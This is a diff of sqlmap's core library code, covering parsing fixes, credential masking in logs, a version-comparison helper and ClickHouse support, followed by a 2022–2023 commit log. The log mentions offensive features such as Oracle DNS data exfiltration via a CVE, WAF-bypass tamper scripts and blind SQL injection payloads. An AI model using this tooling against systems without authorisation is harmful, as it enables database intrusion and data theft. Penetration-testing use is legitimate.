+        columns = OrderedDict()
-        for match in re.finditer(r"[(,]\s*[\"'`]?(\w+)[\"'`]?(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I):
+        value = re.sub(r"\(.+?\)", "", value).strip()
        for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I):
            column = match.group(1).strip(match.group(2) or "")
            if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()):
                continue
            retVal = True
-            columns[match.group(1)] = match.group(2) or "TEXT"
+
            columns[column] = match.group(3) or "TEXT"
        table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns
        kb.data.cachedColumns[conf.db] = table
@@ -3838,6 +3868,10 @@ def checkIntegrity():
                    logger.error("wrong modification time of '%s'" % filepath)
                    retVal = False
    suffix = extractRegexResult(r"#(?P<result>\w+)", VERSION_STRING)
    if suffix and suffix not in {"dev", "stable"}:
        retVal = False
    return retVal
 def getDaysFromLastUpdate():
@@ -4010,7 +4044,7 @@ def maskSensitiveData(msg):
    >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner'
    True
-    >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index') == 'sqlmap.py -u **************************'
+    >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line'
    True
    """
@@ -4026,7 +4060,7 @@ def maskSensitiveData(msg):
            retVal = retVal.replace(value, '*' * len(value))
    # Just in case (for problematic parameters regarding user encoding)
-    for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal):
+    for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal):
        retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
    # Fail-safe substitutions
@@ -4917,6 +4951,12 @@ def decodeDbmsHexValue(value, raw=False):
    >>> decodeDbmsHexValue('3132332031') == u'123 1'
    True
    >>> decodeDbmsHexValue('31003200330020003100') == u'123 1'
    True
    >>> decodeDbmsHexValue('00310032003300200031') == u'123 1'
    True
    >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1'
    True
    >>> decodeDbmsHexValue('313233203') == u'123 ?'
    True
    >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']
@@ -4955,6 +4995,9 @@ def decodeDbmsHexValue(value, raw=False):
                if not isinstance(retVal, six.text_type):
                    retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)
                if u"\x00" in retVal:
                    retVal = retVal.replace(u"\x00", u"")
        return retVal
    try:
@@ -5043,6 +5086,7 @@ def resetCookieJar(cookieJar):
                logger.info(infoMsg)
                content = readCachedFileContent(conf.loadCookies)
                content = re.sub("(?im)^#httpOnly_", "", content)
                lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#'))
                handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR)
                os.close(handle)
@@ -5304,6 +5348,7 @@ def parseRequestFile(reqFile, checkParams=True):
                    continue
            getPostReq = False
            forceBody = False
            url = None
            host = None
            method = None
@@ -5324,7 +5369,7 @@ def parseRequestFile(reqFile, checkParams=True):
                line = line.strip('\r')
                match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
-                if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
+                if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
                    data = ""
                    params = True
@@ -5361,16 +5406,18 @@ def parseRequestFile(reqFile, checkParams=True):
                    elif key.upper() == HTTP_HEADER.HOST.upper():
                        if '://' in value:
                            scheme, value = value.split('://')[:2]
                        splitValue = value.split(":")
                        host = splitValue[0]
-                        if len(splitValue) > 1:
+                        port = extractRegexResult(r":(?P<result>\d+)\Z", value)
-                            port = filterStringValue(splitValue[1], "[0-9]")
+                        if port:
                            value = value[:-(1 + len(port))]
                        host = value
                    # Avoid to add a static content length header to
                    # headers and consider the following lines as
                    # POSTed data
                    if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
                        forceBody = True
                        params = True
                    # Avoid proxy and connection type related headers
--- a/lib/core/compat.py
+++ b/lib/core/compat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -12,6 +12,7 @@ import functools
 import math
 import os
 import random
 import re
 import sys
 import time
 import uuid
@@ -277,7 +278,37 @@ else:
    xrange = xrange
    buffer = buffer
-try:
+def LooseVersion(version):
-    from pkg_resources import parse_version as LooseVersion
+    """
-except ImportError:
+    >>> LooseVersion("1.0") == LooseVersion("1.0")
-    from distutils.version import LooseVersion
+    True
    >>> LooseVersion("1.0.1") > LooseVersion("1.0")
    True
    >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1")
    True
    >>> LooseVersion("1.0.11") < LooseVersion("1.0.111")
    True
    >>> LooseVersion("foobar") > LooseVersion("1.0")
    False
    >>> LooseVersion("1.0") > LooseVersion("foobar")
    False
    >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3")
    True
    >>> LooseVersion("8.0.22-0ubuntu0.20.04.2")
    8.000022
    """
    match = re.search(r"\A(\d[\d.]*)", version or "")
    if match:
        result = 0
        value = match.group(1)
        weight = 1.0
        for part in value.strip('.').split('.'):
            if part.isdigit():
                result += int(part) * weight
            weight *= 1e-3
    else:
        result = float("NaN")
    return result
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -16,6 +16,7 @@ import codecs
 import json
 import re
 import sys
 import time
 from lib.core.bigarray import BigArray
 from lib.core.compat import xrange
@@ -334,6 +335,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
    True
    """
    # Best position for --time-limit mechanism
    if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit):
        raise SystemExit
    if noneToNull and value is None:
        return NULL
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -49,6 +49,19 @@ class AttribDict(dict):
            else:
                return None
    def __delattr__(self, item):
        """
        Deletes attributes
        """
        try:
            return self.pop(item)
        except KeyError:
            if self.keycheck:
                raise AttributeError("unable to access item '%s'" % item)
            else:
                return None
    def __setattr__(self, item, value):
        """
        Maps attributes to values
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -38,6 +38,7 @@ from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import VERTICA_ALIASES
 from lib.core.settings import VIRTUOSO_ALIASES
 from lib.core.settings import CLICKHOUSE_ALIASES
 FIREBIRD_TYPES = {
    261: "BLOB",
@@ -241,6 +242,7 @@ DBMS_DICT = {
    DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
    DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
    DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
    DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
    DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
    DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
    DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),
@@ -268,7 +270,7 @@ HEURISTIC_NULL_EVAL = {
    DBMS.ACCESS: "CVAR(NULL)",
    DBMS.MAXDB: "ALPHA(NULL)",
    DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
-    DBMS.MYSQL: "QUARTER(NULL)",
+    DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
    DBMS.ORACLE: "INSTR2(NULL,NULL)",
    DBMS.PGSQL: "QUOTE_IDENT(NULL)",
    DBMS.SQLITE: "UNLIKELY(NULL)",
@@ -286,6 +288,7 @@ HEURISTIC_NULL_EVAL = {
    DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
    DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
    DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
    DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
 }
 SQL_STATEMENTS = {
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Miroslav Stampar	1740f6332e	Fixes #5536	2023-10-06 19:48:30 +02:00
Miroslav Stampar	e0ec2fcdbd	Implements option --time-limit (#5502 )	2023-09-28 20:34:52 +02:00
Miroslav Stampar	c629374858	Fixes #5521	2023-09-07 11:03:01 +02:00
Miroslav Stampar	6caba631a8	Minor patch (#5508 )	2023-09-04 18:47:25 +02:00
Miroslav Stampar	be118e861c	Implements option --union-values (#5508 )	2023-09-04 18:34:21 +02:00
Miroslav Stampar	4f2a883544	Update for #5508	2023-08-31 12:22:11 +02:00
Miroslav Stampar	89e8b6e5ce	Fixes #5510	2023-08-31 12:16:35 +02:00
Miroslav Stampar	6d472dc2b0	Minor update of SQLite specific payload (#5501 )	2023-08-26 16:02:17 +02:00
soka	2f66aa8ac1	Add SQLite AND boolean-based blind payload (#5501 )	2023-08-26 15:56:49 +02:00
Miroslav Stampar	a7cf68f243	Fixes #5483	2023-08-19 10:24:20 +02:00
Miroslav Stampar	ccc38abff6	Dirty patch for #5488	2023-08-19 10:02:29 +02:00
Miroslav Stampar	3e98fabd23	Fixes #5492	2023-08-19 09:41:24 +02:00
Miroslav Stampar	b368b4a9f9	Fixes #5493	2023-08-16 12:43:55 +02:00
Miroslav Stampar	2c767d7d1f	Patch for #5484	2023-08-15 11:06:28 +02:00
Miroslav Stampar	b836c36d68	Potential fix for #5485	2023-08-15 10:58:12 +02:00
Miroslav Stampar	89f9e5b1e0	Fixes #5477	2023-08-05 11:14:45 +02:00
Miroslav Stampar	5ad099c61d	Fixes #5479	2023-08-01 11:45:20 +02:00
Miroslav Stampar	21878560ee	Fixes #5481	2023-08-01 11:33:13 +02:00
Miroslav Stampar	0d19af8bbc	Fixes #5476	2023-07-25 10:45:33 +02:00
Miroslav Stampar	5bd0f20c84	Removing support for lol FORKZ	2023-07-21 10:54:17 +02:00
Miroslav Stampar	bb48dd037f	Implements #5452	2023-07-06 10:43:43 +02:00
Miroslav Stampar	df388b2150	Python2.7 has been removed from Github CI/CD	2023-06-29 15:51:25 +02:00
Miroslav Stampar	66cc6ae55c	Fixes #5445	2023-06-29 15:43:38 +02:00
Miroslav Stampar	322d80c0cf	Fixes #5444	2023-06-26 16:37:58 +02:00
Miroslav Stampar	1230e57fca	Fixes #5434	2023-06-06 11:23:17 +02:00
Miroslav Stampar	ee15749ac4	Fixes #5431	2023-06-03 22:49:43 +02:00
Miroslav Stampar	8466a89ed3	Trivial update	2023-06-02 11:32:06 +02:00
Miroslav Stampar	acc7b16845	Fixes #5428	2023-06-02 11:25:57 +02:00
Marvin Louis	48c967c01d	add support to leverage CVE-2014-6577 for Oracle DNS data exfiltration (#5410 ) Co-authored-by: marvin <marvin@debian-BULLSEYE-live-builder-AMD64>	2023-05-25 11:27:15 +02:00
Miroslav Stampar	d28a66a340	Minor patch of vuln tests	2023-05-22 11:31:01 +02:00
Miroslav Stampar	30b43eccab	Minor update for #5423	2023-05-22 11:23:04 +02:00
Miroslav Stampar	290a8e7119	Fixes #5411	2023-05-16 10:59:06 +02:00
Miroslav Stampar	cf5e2aa7ef	Fixes #5416	2023-05-16 09:48:33 +02:00
Miroslav Stampar	8bc2ace094	Fixes #5409	2023-05-01 09:46:06 +02:00
Sheldon Klassen	e1043173d7	Disabled hostname and certificate validation for TLSv1.3 support. (#5395 )	2023-04-24 15:06:57 +02:00
Miroslav Stampar	12c472cef5	Fixes #5404	2023-04-24 14:45:19 +02:00
Miroslav Stampar	037a07ddde	Fixes #5401	2023-04-19 16:05:23 +02:00
Miroslav Stampar	0e8940b0be	Fixes #5402	2023-04-19 15:58:08 +02:00
Miroslav Stampar	3ad6727d0c	Potential patch for #5392	2023-04-17 13:35:24 +02:00
Ufuk	4191b06f58	Update README-tr-TR.md (#5393 )	2023-04-17 13:23:36 +02:00
Miroslav Stampar	60bb973c11	Update related to #5389	2023-04-11 14:19:39 +02:00
Miroslav Stampar	0fba9b13b3	Fixes #5387	2023-04-07 13:26:52 +02:00
Miroslav Stampar	17688f6711	Fixes #5379	2023-04-07 12:58:53 +02:00
Miroslav Stampar	3b3c2a5d04	Fixes #5386	2023-04-07 12:32:32 +02:00
Miroslav Stampar	4f7614412f	Fixes #5385	2023-04-05 10:56:36 +02:00
Miroslav Stampar	4efb3ea840	One more update related to the #5381	2023-04-05 10:31:17 +02:00
Miroslav Stampar	c2bac51c4f	Minor update	2023-04-05 09:33:17 +02:00
Miroslav Stampar	7d763e224a	Potential patch for #5381	2023-04-05 09:28:14 +02:00
Miroslav Stampar	4dd362cb2c	Fixes #5374	2023-03-31 22:18:15 +02:00
Miroslav Stampar	077d58c5e9	Fixes #5378	2023-03-30 15:34:46 +02:00
Miroslav Stampar	257c4d1c88	Fixes #5370	2023-03-24 14:29:02 +01:00
Miroslav Stampar	ce30fa08d6	Fixes #5368	2023-03-20 11:59:54 +01:00
patr1ckbat3man	3ca2533c39	Slovak translation (#5366 ) * added slovak translation * changed readme error	2023-03-20 11:55:17 +01:00
Miroslav Stampar	75bfebed9d	Fixes #5367	2023-03-20 11:50:44 +01:00
Miroslav Stampar	3117730d84	Fixes #5364	2023-03-15 23:00:16 +01:00
Miroslav Stampar	323af987ed	Fixes #5358 (related to #5050 )	2023-03-09 15:22:28 +01:00
Miroslav Stampar	80dc67f85a	Patch for #5338	2023-02-27 18:21:35 +01:00
Miroslav Stampar	ca2f094e4a	Doing a dirty patch for #5050	2023-02-27 17:57:57 +01:00
Miroslav Stampar	3aa6692b82	Patch for #5348	2023-02-27 17:49:42 +01:00
Miroslav Stampar	aabfcbc3e1	Minor update	2023-02-27 17:44:11 +01:00
Miroslav Stampar	d42174e8a0	Patch for #5343	2023-02-24 21:59:12 +01:00
Miroslav Stampar	a1bf89d31e	Fixes #5344	2023-02-24 21:51:52 +01:00
Miroslav Stampar	99ea44c7b3	Fixes #5339	2023-02-21 00:39:07 +01:00
Miroslav Stampar	abc092959f	Minor update of fingerprinting stuff	2023-02-20 15:37:32 +01:00
Miroslav Stampar	d5547d908c	Periodic recloak	2023-02-20 15:20:15 +01:00
Miroslav Stampar	25fe5dce21	Minor update	2023-02-20 15:17:09 +01:00
Miroslav Stampar	1f82d9587a	Minor patch	2023-02-20 15:08:49 +01:00
Miroslav Stampar	15d9c8f9ed	Updating bottlepy to the latest revision	2023-02-20 14:44:56 +01:00
Miroslav Stampar	01310a47fd	Minor update	2023-02-20 14:35:35 +01:00
Miroslav Stampar	56177c3d2a	Minor update of common tables/columns	2023-02-20 13:32:38 +01:00
Miroslav Stampar	c5d7c542a2	Update for Apache Derby (#5315 )	2023-02-12 17:12:38 +01:00
Miroslav Stampar	4357b0087d	Minor refactoring for #5308	2023-02-07 09:49:42 +01:00
Miroslav Stampar	d3bfe59401	Fixes #5308	2023-02-07 09:40:42 +01:00
Miroslav Stampar	9eb970e7c7	More fixes related to ClickHouse support (#5229 )	2023-02-04 00:28:33 +01:00
Miroslav Stampar	46495f70f8	Adding char escaper to ClickHouse support (#5229 )	2023-02-04 00:00:21 +01:00
Miroslav Stampar	30ba167cc1	Some more fixes related to ClickHouse support (#5229 )	2023-02-03 23:56:50 +01:00
Miroslav Stampar	d7180d38c4	Some fixes related to ClickHouse support (#5229 )	2023-02-03 23:30:05 +01:00
Miroslav Stampar	b1aaac5ba2	Minor update	2023-02-03 23:14:29 +01:00
Alexis Danizan	8962e152ac	Add Clickhouse support (#5229 ) Co-authored-by: pentest <>	2023-02-03 23:10:12 +01:00
Paul Werther	c58383e684	add performance_schema to mysql prediction file (#5305 )	2023-02-03 22:54:35 +01:00
Miroslav Stampar	4585243175	Implements tamper script if2case (#5301 )	2023-02-01 13:53:19 +01:00
Miroslav Stampar	fbfed061b8	Fixes #5300	2023-01-28 21:50:26 +01:00
Miroslav Stampar	fdbc323aa6	One more update for #5295	2023-01-24 12:08:02 +01:00
Miroslav Stampar	6336389322	Another update for #5295	2023-01-24 12:00:23 +01:00
Miroslav Stampar	a7b59243e2	One more update regarding #4870	2023-01-23 18:04:47 +01:00
Miroslav Stampar	c8eea24ac4	Implements #5295	2023-01-23 16:40:41 +01:00
Miroslav Stampar	1be7a5aea8	Fixes #4870	2023-01-23 16:21:46 +01:00
Miroslav Stampar	d0d4cf4f6d	Minor update regarding #5297	2023-01-23 16:05:46 +01:00
Miroslav Stampar	1f83076e70	Fixes #5287	2023-01-15 18:07:44 +01:00
Miroslav Stampar	b0a1efaa44	Minor update for #5279	2023-01-09 17:12:26 +01:00
Miroslav Stampar	de527f1814	Minor update for #5285	2023-01-09 15:35:21 +01:00
Miroslav Stampar	96adc7c098	Fixes #5285	2023-01-09 15:34:08 +01:00
Miroslav Stampar	7940b572ef	Trivy minor version bump	2023-01-02 23:39:27 +01:00
Miroslav Stampar	05293e01a4	Year and version bump	2023-01-02 23:24:59 +01:00
Miroslav Stampar	216565fb05	Fixes #5275	2022-12-28 16:35:26 +01:00
Miroslav Stampar	6e3eaca547	Minor update of testing stuff	2022-12-23 16:24:41 +01:00
Miroslav Stampar	5592f55cae	Revert "JSON WAF bypass tamper scripts (#5260 )" (#5273 ) This reverts commit `12e3ed14ae`.	2022-12-23 15:59:12 +01:00
noamiscool	12e3ed14ae	JSON WAF bypass tamper scripts (#5260 ) * added JSON waf bypass techniques * added a link for WAF evasion technique blog * Added generic JSON WAF bypass	2022-12-23 15:52:49 +01:00
Miroslav Stampar	dd4010f16f	Fixes #5268	2022-12-23 15:49:08 +01:00
Miroslav Stampar	4cd146cc86	Fix for masking of sensitive data	2022-12-21 14:03:40 +01:00
Miroslav Stampar	e85bc30f95	Fixes #5267	2022-12-20 13:29:37 +01:00
Miroslav Stampar	b7411211af	Fixes #5262	2022-12-17 14:46:00 +01:00
Miroslav Stampar	a11f79e16f	One more update regarding #5164	2022-12-14 00:35:27 +01:00
Miroslav Stampar	7c9e4c4a65	Fixes #5164	2022-12-14 00:32:35 +01:00
Miroslav Stampar	76202e565d	Fixes #5258	2022-12-13 23:52:04 +01:00
Miroslav Stampar	86ac3025ed	Improving SQLite table schema parsing (#2678 )	2022-12-13 23:42:24 +01:00
Miroslav Stampar	ebaee3a4e6	Minor patch for #5255	2022-12-12 15:24:27 +01:00
Miroslav Stampar	33a6547f5b	Fixes #5252	2022-12-06 11:55:03 +01:00
Miroslav Stampar	ad529f24cb	Minor update	2022-11-29 15:12:18 +01:00
Miroslav Stampar	3d2f89345f	Fixes #5242	2022-11-29 15:05:34 +01:00
Miroslav Stampar	58f10093a0	Minor update	2022-11-29 14:48:20 +01:00
Miroslav Stampar	6aaf7d3960	Fixes #5240	2022-11-22 00:28:20 +01:00
Miroslav Stampar	b8fa0edea6	Fixes #5232	2022-11-21 00:37:48 +01:00
Miroslav Stampar	55b2b43f0e	Fixes #5233	2022-11-21 00:20:05 +01:00
Miroslav Stampar	7bc0b08fd6	Implementing option '--dump-file' (#5238 )	2022-11-21 00:03:36 +01:00
Miroslav Stampar	62bba470d6	Fixes #5220	2022-11-02 10:49:09 +01:00
Miroslav Stampar	eda669e10b	Fixes #5216	2022-11-01 23:26:15 +01:00
Fabian Ising	c382321134	Better handling of CookieJar Runtime Exception (#5206 ) Fixes #5187	2022-10-21 19:10:43 +02:00